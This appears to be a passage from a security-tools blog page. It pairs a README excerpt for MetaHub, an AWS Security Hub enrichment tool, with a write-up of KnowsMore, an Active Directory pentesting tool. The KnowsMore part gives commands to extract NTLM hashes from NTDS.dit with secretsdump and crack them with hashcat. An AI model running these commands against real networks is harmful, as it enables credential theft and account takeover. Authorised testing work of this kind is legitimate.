Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the tag awsApplication, but you can extend this functionality based on your context, for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on the account ID or alias. You can define your application definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses | Value | Description
unknown | - | The resource couldn't be checked for application.

Findings Scoring

As part of the impact score calculation, we also evaluate the total amount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
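A minimal Python sketch of this metric, assuming the severity weights used in the example above (CRITICAL=4, HIGH=3, LOW=0.5; weights for other severity levels would need to be added):

# Sketch only: severity weights taken from the example above.
SEVERITY_WEIGHTS = {"CRITICAL": 4, "HIGH": 3, "LOW": 0.5}
HIGHEST = SEVERITY_WEIGHTS["CRITICAL"]

def findings_score(severity_labels):
    # Sum of (finding severity / highest severity), capped at 1.
    total = sum(SEVERITY_WEIGHTS[s] / HIGHEST for s in severity_labels)
    return min(total, 1.0)

print(findings_score(["HIGH", "LOW"]))  # 0.875, matching the example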

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates the impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Create enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation.

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tags from the affected resources.
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events.
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations: for example, whether the resource is public, whether it is encrypted, whether it is part of a VPC, or whether it uses a specific IAM role. For more information, refer to Config filters and Tags filters.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, you can enrich your findings back directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update many security findings at once. MetaHub allows you to execute bulk updates to AWS Security Hub findings, such as changing the Workflow Status, using the option --update-findings. As an example, suppose you identified hundreds of security findings about public resources, but based on the MetaHub context you know those resources are not effectively public, as they are protected by routing and firewalls. You can update all the findings matching your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your findings with a custom text for future reference.

MetaHub supports different Output Modes, some of them JSON-based, like json-inventory, json-statistics, json-short, and json-full, but also powerful html, xlsx, and csv outputs. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources showing only the tags Owner, Service, and Environment. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some check behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and their weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/resources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to the repository dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tags for MetaHub containers are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged in to AWS on the host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this either by passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.
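As a sketch of the mounting approach (the in-container path assumes the image runs as root; adjust it if your setup differs):

docker run -v ~/.aws:/root/.aws:ro -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h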

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your Lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume by adding the option --mh-assume-role to the Lambda function configuration (see previous step), and by adding the corresponding policy to the Lambda role to allow it to assume that role.
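As a hedged sketch, the statement added to the Lambda role could look like the following (the role name MetaHubContextRole is purely illustrative; use the ARN of the role you configured with --mh-assume-role):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "sts:AssumeRole",
      "Resource": "arn:aws:iam::*:role/MetaHubContextRole"
    }
  ]
}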

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means it will update your findings back with MetaHub outputs. If you want to change this, see Customize Lambda behaviour.

You first need to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID="ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY="XXXXXXXXX"
export AWS_SESSION_TOKEN="XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in to. Just use the option --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running, or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs enough permissions to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will assume the one you are logged in to.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.
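For example, a multi-account invocation could look like this (the account ID and role name are illustrative):

./metahub --sh-region us-east-1 --sh-account 012345678901 --sh-assume-role SecurityHubReadRole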

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "securityhub:GetFindings",
        "securityhub:ListFindingAggregators",
        "securityhub:BatchUpdateFindings",
        "iam:ListAccountAliases"
      ],
      "Resource": [
        "*"
      ]
    }
  ]
}

Configuring Context

If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries, because the affected resources are not in the same AWS Account as the AWS Security Hub findings. The --mh-assume-role option will be used to connect with the affected resources directly in the affected account. This role needs enough permissions to describe resources.
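For example, combining the Security Hub and Context roles in a multi-account run (the account ID and role names are illustrative):

./metahub --sh-account 012345678901 --sh-assume-role SecurityHubReadRole --mh-assume-role ContextReadRole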

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters for filtering findings, as this option relies on the AWS API for filtering. You also can't use the options --update-findings or --enrich-findings, as those findings are not in AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all finding titles together under each affected resource, along with the AwsAccountId, Region, and ResourceType:

JSON-Full

Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column.
  • You can group/ungroup findings.
  • You can also download that data to XLSX, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.


XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using the following command:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE using the option --sh-filters, the same way you would filter using the AWS CLI, but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template (see Security Hub Filtering using YAML templates).

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW

If a value contains spaces, you should specify it using double quotes: ProductName="Security Hub".

You can add how many different filters you need to your query and also add the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:securityhub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub, like EQUALS, PREFIX, NOT_EQUALS, or PREFIX_NOT_EQUALS. You can call your YAML file using the option --sh-template <FILE>.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metahub --sh-template templates/default.yml
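The exact template schema is defined by the files under templates/; as a hypothetical sketch, a template mirroring the AWS Security Hub API filter structure could look like this:

# Hypothetical sketch; check templates/default.yml for the real schema.
RecordState:
  - Comparison: EQUALS
    Value: ACTIVE
Title:
  - Comparison: PREFIX
    Value: "EC2."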

Config Filters

MetaHub supports Config filters (and Associations) using KEY=VALUE, where the value can only be True or False, with the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True means True or with data.
  • A Config filter set to False means False or without data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes the Context module for the affected resources based on the previous list of findings.
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=True

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes the Tags module for the affected resources based on the previous list of findings.
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update the workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) of your AWS Security Hub findings with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. The AWS Security Hub API is limited to 100 findings per update, so MetaHub will split your results into chunks of 100 items and update your findings regardless of the amount.

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW, I found two affected resources with three findings each, making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.
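As a side note on the 100-findings limit mentioned above, here is a minimal Python sketch of such chunked updates using boto3 (an illustration, not MetaHub's actual code; the note text is a placeholder):

import boto3

def update_in_chunks(finding_identifiers, note_text):
    # BatchUpdateFindings accepts at most 100 findings per call.
    sh = boto3.client("securityhub")
    for i in range(0, len(finding_identifiers), 100):
        sh.batch_update_findings(
            FindingIdentifiers=finding_identifiers[i:i + 100],  # [{"Id": ..., "ProductArn": ...}]
            Workflow={"Status": "NOTIFIED"},
            Note={"Text": note_text, "UpdatedBy": "MetaHub"},
        )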

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public=True with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-config public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.

Shadowing is when two checks refer to the same issue, but one in a more generic way than the other.

Duplication is when you use more than one scanner and get the same problem reported by each of them.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that the SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have four findings for one resource in your dashboard!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the affected resource, so you end up with only one result, or one non-compliant resource.

You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update the Workflow Status of these four findings using only one command: see Updating Workflow Status.

Contributing

You can follow this guide if you want to contribute to the Context module.



KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse the quality of passwords (length, lower case, upper case, digits, special and Latin characters)
  • Analyse the similarity of passwords with the company and user names
  • Search for users, passwords and hashes
  • Export all cracked credentials directly to the BloodHound Neo4j database as 'owned objects'
  • Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords, like the output below.

KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problems with dependency versions, check the Virtual ENV file.

Execution Flow

There is no mandatory order for importing data, but for better data correlation we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data is stored in a SQLite database.

knowsmore --create-db

Importing BloodHound files

We can import all BloodHound files into KnowsMore, correlate the data, and sync it to the Neo4j BloodHound database. This way, you can use KnowsMore alone to import JSON files directly into the Neo4j database instead of using the extremely slow BloodHound user interface.

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: KnowsMore can import both BloodHound ZIP files and JSON files, but we recommend using the ZIP file, because KnowsMore will automatically order the files for better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of the bloodhound-importer was inspired by the Fox-IT BloodHound Import implementation. We implemented several changes to save all data in the KnowsMore SQLite database and then do an incremental sync to the Neo4j database. This strategy has several benefits, such as imports at least 10x faster than the original BloodHound user interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use secretsdump to extract the NTDS hashes with the command below

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
knowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

In order to crack the hashes, I usually use hashcat with the commands below

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

Importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to the name of your company

Wipe sensitive data

As passwords and their hashes are extremely sensitive data, there is a module to replace the clear-text passwords and their respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During an assessment you may find (in several ways) a user's password, which you can add to the KnowsMore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

